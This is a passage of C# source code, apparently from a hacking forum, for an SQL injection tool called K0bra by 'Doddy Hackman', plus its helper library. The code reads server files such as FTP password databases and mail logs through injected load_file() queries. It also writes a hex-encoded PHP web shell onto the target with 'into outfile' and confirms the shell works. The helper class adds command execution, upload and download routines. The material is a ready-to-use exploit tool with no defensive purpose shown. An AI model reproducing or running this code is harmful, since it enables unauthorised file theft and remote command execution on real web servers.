"/etc/pure-ftpd/pureftpd.pdb", "/var/log/pure-ftpd/pure-ftpd.log", "/logs/pure-ftpd.log", "/var/log/pureftpd.log", "/var/log/ftp-proxy/ftp-proxy.log", "/var/log/ftp-proxy", "/var/log/ftplog", "/etc/logrotate.d/ftp", "/etc/ftpchroot", "/etc/ftphosts", "/var/log/exim_mainlog", "/var/log/exim/mainlog", "/var/log/maillog", "/var/log/exim_paniclog", "/var/log/exim/paniclog", "/var/log/exim/rejectlog", "/var/log/exim_rejectlog" };
List<string> archivos = new List<string>();
foreach (string ruta in rutas)
{
Match regex = Regex.Match(url, "(.*)hackman(.*)", RegexOptions.IgnoreCase);
if (regex.Success)
{
urlgen = regex.Groups[1].Value + "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(" + hexencode(ruta) + "),char(69,82,84,79,82,56,53,52))))" + regex.Groups[2].Value;
code = toma(urlgen);
regex = Regex.Match(code, "ERTOR854", RegexOptions.IgnoreCase);
if (regex.Success)
{
archivos.Add(ruta);
}
}
}
return archivos;
}
public string make_shell(string full, string dir)
{
string url = target;
string code = "";
string response = "";
string linea = "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e";
string lugar = full + "/cmd.php";
string lugardos = dir + "/cmd.php";
DH_Tools tools = new DH_Tools();
string host = tools.urisplit(url, "host");
string webtest = "http://" + host + lugardos;
string web1 = url.Replace("hackman", linea);
string formandoweb = web1 + bypass1 + "into" + bypass1 + "outfile" + bypass1 + "'" + lugar + "'" + bypass2;
toma(formandoweb);
code = toma(webtest);
Match regex = Regex.Match(code, "Mini Shell By Doddy", RegexOptions.IgnoreCase);
if (regex.Success)
{
response = webtest;
}
else
{
response = "Error";
}
return response;
}
public string toma(string url)
{
string code = "";
try
{
WebClient nave = new WebClient();
nave.Headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0";
code = nave.DownloadString(url);
}
catch
{
//
}
return code;
}
public string hexencode(string texto)
{
string resultado = "";
byte[] enc = Encoding.Default.GetBytes(texto);
resultado = BitConverter.ToString(enc);
resultado = resultado.Replace("-", "");
return "0x" + resultado;
}
}
}
// The End ?
Código: Seleccionar todo
// Class Name : DH Tools
// Version : Beta
// Author : Doddy Hackman
// (C) Doddy Hackman 2014
//
// Functions :
//
// [+] HTTP Methods GET & POST
// [+] Get HTTP Status code number
// [+] HTTP FingerPrinting
// [+] Read File
// [+] Write File
// [+] GET OS
// [+] Remove duplicates from a List
// [+] Cut urls from a List
// [+] Download
// [+] Upload
// [+] Get Basename from a path
// [+] Execute commands
// [+] URI Split
// [+] MD5 Hash Generator
// [+] Get MD5 of file
// [+] Get IP address from host name
//
// Credits :
//
// Method POST -> https://technet.rapaport.com/Info/Prices/SampleCode/Full_Example.aspx
// Method GET -> http://stackoverflow.com/questions/4510212/how-i-can-get-web-pages-content-and-save-it-into-the-string-variable
// HTTP Headers -> http://msdn.microsoft.com/en-us/library/system.net.httpwebresponse.headers%28v=vs.110%29.aspx
// List Cleaner -> http://forums.asp.net/t/1318899.aspx?Remove+duplicate+items+from+List+String+
// Execute command -> http://www.codeproject.com/Articles/25983/How-to-Execute-a-Command-in-C
// MD5 Hash Generator -> http://www.java2s.com/Code/CSharp/Security/GetandverifyMD5Hash.htm
// Get MD5 of file -> http://stackoverflow.com/questions/10520048/calculate-md5-checksum-for-a-file
//
// Thanks to : $DoC and atheros14 (Forum indetectables)
//
using System;
using System.Collections.Generic;
using System.Text;
using System.Net;
using System.IO;
using System.Text.RegularExpressions;
using System.Security.Cryptography;
namespace K0bra
{
class DH_Tools
{
public string toma(string url)
{
string code = "";
try
{
WebClient nave = new WebClient();
nave.Headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0";
code = nave.DownloadString(url);
}
catch
{
//
}
return code;
}
public string tomar(string url, string par)
{
string code = "";
try
{
HttpWebRequest nave = (HttpWebRequest)
WebRequest.Create(url);
nave.UserAgent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0";
nave.Method = "POST";
nave.ContentType = "application/x-www-form-urlencoded";
Stream anteantecode = nave.GetRequestStream();
anteantecode.Write(Encoding.ASCII.GetBytes(par), 0, Encoding.ASCII.GetBytes(par).Length);
anteantecode.Close();
StreamReader antecode = new StreamReader(nave.GetResponse().GetResponseStream());
code = antecode.ReadToEnd();
}
catch
{
//
}
return code;
}
public string respondecode(string url)
{
String code = "";
try
{
HttpWebRequest nave = (HttpWebRequest)WebRequest.Create(url);
nave.UserAgent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0";
HttpWebResponse num = (HttpWebResponse)nave.GetResponse();
int number = (int)num.StatusCode;
code = Convert.ToString(number);
}
catch
{
code = "404";
}
return code;
}
public string httpfinger(string url)
{
String code = "";
try
{
HttpWebRequest nave1 = (HttpWebRequest)WebRequest.Create(url);
HttpWebResponse nave2 = (HttpWebResponse)nave1.GetResponse();
for (int num = 0; num < nave2.Headers.Count; ++num)
{
code = code + "[+] " + nave2.Headers.Keys[num] + ":" + nave2.Headers[num] + Environment.NewLine;
}
nave2.Close();
}
catch
{
//
}
return code;
}
public string openword(string file)
{
String code = "";
try
{
code = System.IO.File.ReadAllText(file);
}
catch
{
//
}
return code;
}
public void savefile(string file, string texto)
{
try
{
System.IO.StreamWriter save = new System.IO.StreamWriter(file, true);
save.Write(texto);
save.Close();
}
catch
{
//
}
}
public string getos()
{
string code = "";
try
{
System.OperatingSystem os = System.Environment.OSVersion;
code = Convert.ToString(os);
}
catch
{
code = "?";
}
return code;
}
public List<string> repes(List<string> array)
{
List<string> repe = new List<string>();
foreach (string lin in array)
{
if (!repe.Contains(lin))
{
repe.Add(lin);
}
}
return repe;
}
public List<string> cortar(List<string> otroarray)
{
List<string> cort = new List<string>();
foreach (string row in otroarray)
{
String lineafinal = "";
Match regex = Regex.Match(row, @"(.*)\?(.*)=(.*)", RegexOptions.IgnoreCase);
if (regex.Success)
{
lineafinal = regex.Groups[1].Value + "?" + regex.Groups[2].Value + "=";
cort.Add(lineafinal);
}
}
return cort;
}
public string download(string url, string savename)
{
String code = "";
WebClient nave = new WebClient();
nave.Headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0";
try
{
nave.DownloadFile(url, savename);
code = "OK";
}
catch
{
code = "Error";
}
return code;
}
public string upload(string link, string archivo)
{
String code = "";
try
{
WebClient nave = new WebClient();
nave.Headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0";
byte[] codedos = nave.UploadFile(link, "POST", archivo);
code = System.Text.Encoding.UTF8.GetString(codedos, 0, codedos.Length);
}
catch
{
code = "Error";
}
return code;
}
public string basename(string file)
{
String nombre = "";
FileInfo basename = new FileInfo(file);
nombre = basename.Name;
return nombre;
}
public string console(string cmd)
{
string code = "";
try
{
System.Diagnostics.ProcessStartInfo loadnow = new System.Diagnostics.ProcessStartInfo("cmd", "/c " + cmd);
loadnow.RedirectStandardOutput = true;
loadnow.UseShellExecute = false;
loadnow.CreateNoWindow = true;
System.Diagnostics.Process loadnownow = new System.Diagnostics.Process();
loadnownow.StartInfo = loadnow;
loadnownow.Start();
code = loadnownow.StandardOutput.ReadToEnd();
}
catch
{
code = "Error";
}
return code;
}
public string urisplit(string url, string opcion)
{
string code = "";
Uri dividir = new Uri(url);
if (opcion == "host")
{
code = dividir.Host;
}
if (opcion == "port")
{
code = Convert.ToString(dividir.Port);
}
if (opcion == "path")
{
code = dividir.LocalPath;
}
if (opcion == "file")
{
code = dividir.AbsolutePath;
FileInfo basename = new FileInfo(code);
code = basename.Name;
}
if (opcion == "query")
{
code = dividir.Query;
}
if (opcion == "")
{
code = "Error";
}
return code;
}
public string convertir_md5(string text)
{
MD5 convertirmd5 = MD5.Create();
byte[] infovalor = convertirmd5.ComputeHash(Encoding.Default.GetBytes(text));
StringBuilder guardar = new StringBuilder();
for (int numnow = 0; numnow < infovalor.Length; numnow++)
{
guardar.Append(infovalor[numnow].ToString("x2"));
}
return guardar.ToString();
}
public string md5file(string file)
{
string code = "";
try
{
var gen = MD5.Create();
var ar = File.OpenRead(file);
code = BitConverter.ToString(gen.ComputeHash(ar)).Replace("-", "").ToLower();
}
catch
{
code = "Error";
}
return code;
}
public string getip(string host)
{
string code = "";
try
{
IPAddress[] find = Dns.GetHostAddresses(host);
code = find[0].ToString();
}
catch
{
code = "Error";
}
return code;
}
}
}
// The End ?